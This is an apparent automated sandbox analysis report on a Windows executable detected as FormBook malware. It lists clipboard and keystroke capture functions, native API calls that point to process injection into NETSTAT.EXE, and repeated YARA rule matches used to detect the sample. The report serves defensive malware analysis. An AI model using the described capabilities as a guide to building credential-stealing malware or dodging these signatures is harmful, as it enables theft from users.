Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.205550843.000000000BA46000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00420CC0 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader, 0_2_00420CC0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0043DD3C GetKeyboardState, 0_2_0043DD3C

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.4180000.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.4180000.3.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.41b0000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.mp0nMsMroT.exe.41b0000.4.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Contains functionality to call native functions
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00440CB8 NtdllDefWindowProc_A,GetCapture, 0_2_00440CB8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045BA98 NtdllDefWindowProc_A, 0_2_0045BA98
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C240 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A, 0_2_0045C240
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0045C2F0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus, 0_2_0045C2F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_0042A524 NtdllDefWindowProc_A, 0_2_0042A524
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00450C40 GetSubMenu,SaveDC,RestoreDC,7344B080,SaveDC,RestoreDC,NtdllDefWindowProc_A, 0_2_00450C40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417940 NtCreateFile, 1_2_00417940
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004179F0 NtReadFile, 1_2_004179F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417A70 NtClose, 1_2_00417A70
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00417B20 NtAllocateVirtualMemory, 1_2_00417B20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004178FA NtCreateFile, 1_2_004178FA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041793A NtCreateFile, 1_2_0041793A
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_004179EA NtReadFile, 1_2_004179EA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00AF98F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00AF9860
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9840 NtDelayExecution,LdrInitializeThunk, 1_2_00AF9840
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF99A0 NtCreateSection,LdrInitializeThunk, 1_2_00AF99A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00AF9910
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A20 NtResumeThread,LdrInitializeThunk, 1_2_00AF9A20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00AF9A00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A50 NtCreateFile,LdrInitializeThunk, 1_2_00AF9A50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF95D0 NtClose,LdrInitializeThunk, 1_2_00AF95D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9540 NtReadFile,LdrInitializeThunk, 1_2_00AF9540
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00AF96E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00AF9660
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00AF97A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00AF9780
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00AF9FE0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00AF9710
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF98A0 NtWriteVirtualMemory, 1_2_00AF98A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9820 NtEnumerateKey, 1_2_00AF9820
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFB040 NtSuspendThread, 1_2_00AFB040
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF99D0 NtCreateProcessEx, 1_2_00AF99D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9950 NtQueueApcThread, 1_2_00AF9950
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A80 NtOpenDirectoryObject, 1_2_00AF9A80
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9A10 NtQuerySection, 1_2_00AF9A10
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFA3B0 NtGetContextThread, 1_2_00AFA3B0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9B00 NtSetValueKey, 1_2_00AF9B00
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF95F0 NtQueryInformationFile, 1_2_00AF95F0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9520 NtWaitForSingleObject, 1_2_00AF9520
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AFAD30 NtSetContextThread, 1_2_00AFAD30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9560 NtWriteFile, 1_2_00AF9560
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF96D0 NtCreateKey, 1_2_00AF96D0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9610 NtEnumerateValueKey, 1_2_00AF9610
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9670 NtQueryInformationProcess, 1_2_00AF9670
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AF9650 NtQueryValueKey, 1_2_00AF9650
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87A70 NtClose, 5_2_02D87A70
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87B20 NtAllocateVirtualMemory, 5_2_02D87B20
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D879F0 NtReadFile, 5_2_02D879F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D87940 NtCreateFile, 5_2_02D87940
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D878FA NtCreateFile, 5_2_02D878FA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D879EA NtReadFile, 5_2_02D879EA
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8793A NtCreateFile, 5_2_02D8793A
Detected potential crypto function
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00450C40 0_2_00450C40
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 0_2_00455F90 0_2_00455F90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00401026 1_2_00401026
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041B10C 1_2_0041B10C
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00408A50 1_2_00408A50
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041BB67 1_2_0041BB67
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402D87 1_2_00402D87
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041ADA4 1_2_0041ADA4
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_0041BF77 1_2_0041BF77
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE20A0 1_2_00AE20A0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B820A8 1_2_00B820A8
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACB090 1_2_00ACB090
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B828EC 1_2_00B828EC
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B8E824 1_2_00B8E824
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B71002 1_2_00B71002
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD4120 1_2_00AD4120
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ABF900 1_2_00ABF900
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B822AE 1_2_00B822AE
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AEEBB0 1_2_00AEEBB0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7DBD2 1_2_00B7DBD2
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B703DA 1_2_00B703DA
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82B28 1_2_00B82B28
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AC841F 1_2_00AC841F
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7D466 1_2_00B7D466
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AE2581 1_2_00AE2581
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00ACD5E0 1_2_00ACD5E0
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B825DD 1_2_00B825DD
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AB0D20 1_2_00AB0D20
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82D07 1_2_00B82D07
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81D55 1_2_00B81D55
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B82EF7 1_2_00B82EF7
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00AD6E30 1_2_00AD6E30
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B7D616 1_2_00B7D616
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: 1_2_00B81FF1 1_2_00B81FF1
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D78A50 5_2_02D78A50
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8BB67 5_2_02D8BB67
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8B10C 5_2_02D8B10C
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72FB0 5_2_02D72FB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8BF77 5_2_02D8BF77
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D8AD9D 5_2_02D8AD9D
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72D90 5_2_02D72D90
Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 5_2_02D72D87 5_2_02D72D87
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 00403FC0 appears 68 times
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 00ABB150 appears 45 times
Source: C:\Users\user\Desktop\mp0nMsMroT.exe Code function: String function: 004060D4 appears 62 times
PE file contains strange resources
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
Source: mp0nMsMroT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: mp0nMsMroT.exe, 00000000.00000002.184868899.0000000002140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameuser32j% vs mp0nMsMroT.exe
Source: mp0nMsMroT.exe, 00000000.00000002.184880166.0000000002150000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs mp0nMsMroT.exe
Source: mp0nMsMroT.exe, 00000001.00000002.232810465.0000000000D3F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs mp0nMsMroT.exe
Yara signature match
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000001.183329439.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.186329049.0000000004180000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.450793023.0000000002D70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232190204.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232380892.00000000005C0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.449111144.00000000000E0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.186389083.00000000041B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.232227365.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.1.mp0nMsMroT.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.1.mp0nMsMroT.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
